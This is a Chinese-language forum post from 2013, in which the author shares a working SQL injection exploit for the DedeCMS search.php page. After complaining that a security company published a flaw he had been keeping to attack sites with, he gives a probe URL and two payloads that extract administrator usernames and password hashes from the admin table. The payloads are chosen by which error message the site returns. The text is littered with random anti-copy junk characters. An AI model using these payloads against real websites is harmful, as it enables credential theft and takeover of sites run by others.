转载不加作者名的没JJ
, e" {- n7 O; G" |7 I" |
, ?! O8 X. q6 Q3 l" F哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
$ E/ U$ e( F3 h) E& ?, P5 ]5 y; f1 e
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
. V; l4 A+ R4 m. Z6 C |
! q* M2 }$ y/ ]& x8 }0 f我一般是这样测试的:
) K0 h% g8 c; J% k6 D8 W
" Z. c% d# l1 F( G( J( _/ F4 v8 O( {# ~提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a' ~$ v% N* j5 N: b d) a1 Q
' a1 \( u+ d: v, \3 F! j转载不加作者名的没JJ
" R t+ ~! G0 j; \ c2 E2 o. w; l- W! f0 }2 \8 H3 R( d
作者:鬼哥
2 a i2 b8 B6 S s
# f9 \ k0 @5 b0 j& Z. }5 O: j1 | + @. q! T( x" a
1 @* F9 O3 S4 }3 \7 k
看结果如果提示6 ~' t+ X3 r! K/ B7 C+ Q0 t9 `* n0 ~
) S, `0 W V Z0 Y
Safe Alert: Request Error step 2 !
" R0 V; M4 y. s8 ~
?" H& F2 z8 N: |, n( S那么直接用下面的exp
% \% {" \( Y9 B; Z$ Y9 i% k1 l$ U E5 h7 u7 A
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
4 R$ |9 i R$ q1 T6 x% E @2 X# s! d1 Y6 W8 Y( w9 h, i
, T& B) _: z) r1 o看结果如果提示- s5 A' z/ z: f
% o( k9 G- u% d7 n
Safe Alert: Request Error step 1 !, N$ V: i: D8 Q w+ t
, k% C g, ?+ p8 J! |0 @$ l+ s2 ^* t4 x
那么直接用下面的exp
, b9 n7 A( W) u9 Z: u S; C9 j. o2 B/ `+ H- Q& S3 G
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a5 k, L& F+ f5 J8 J
8 n* ]2 H; l& x5 ?$ X; ^
# S3 B9 Q, s7 O0 s6 _如果正常显示证明漏洞不存在了。
5 L( ?& V7 `" ]1 U# Z) x p& k- _
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对